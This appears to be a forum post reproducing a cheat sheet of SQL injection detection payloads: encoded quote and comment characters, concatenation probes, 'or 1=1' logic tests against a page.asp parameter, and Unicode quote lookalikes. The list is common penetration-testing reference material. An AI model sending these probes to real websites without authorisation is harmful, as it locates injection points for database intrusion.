09-14-2022, 09:47 PM
Detection of an SQL injection entry point Simple characters
Multiple encoding
Merging characters
Logic Testing
Weird characters
Quote:'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
Multiple encoding
Quote:%%2727
%25%27
Merging characters
Quote:`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
Logic Testing
Quote:page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
Weird characters
Quote:Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')